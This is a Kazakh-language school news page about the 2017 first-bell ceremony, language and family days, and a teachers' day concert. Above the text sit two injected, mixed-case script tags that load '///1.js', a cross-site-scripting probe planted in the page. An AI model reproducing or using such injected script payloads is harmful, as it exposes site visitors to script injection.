<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.10.2017

Оқу қайта басталды,

Мектебіміз қарсы алды.

Қоңыраудың дауысы

Күмбірлетті аспанды.

Қағылмақ міне әуенге бөлеп,

Қағылмақ алғаш қоңырау.

Нұр толып жүзің, гүл толып құшақ,

Шаттыққа толсын омырау- деген өлең шумақтарындағыдай біздің мектебімізде де  «Менің

Отаным – Қазақстан!»  атты алғашқы қоңырау салтанатты жиыны өтті. 1-сыныпта 9 оқушы мектеп табалдырығын аттады . Қадамдарың  құтты, қаламдарың ұшты болсын дейміз.

4-қыркүйек отбасы күніне, денсаулық күніне арналған іс-шаралар өз жалғасын тапты. Тілдер күніне

онкүндік жарияланып, мектепішілк әр-түрлі шаралар,. Сынып сағаттары, мәнерлеп оқу сайыстары өткізілді.

Қазан айының алғашқы аптасында Қарттар күні, Ұстаздар күні белгіленді. Қарттар күніне орай қарт

адамдарға картоп ,отын жинауға «Тимур» командасы көмектерін көрсетті. 28-қыркүйек күні мектебіміздің оқушылары «Ұстаз-саған мың алғыс» атты шағын концерт ұйымдастырды. Арнау әндерін әуелетіп,мың

бұралған билерімен ұстаздар қауымын ыстық ықыласқа бөледі.

 

Просмотров: 931


Пікір қосу



Деректерді қолтаңбаға қосу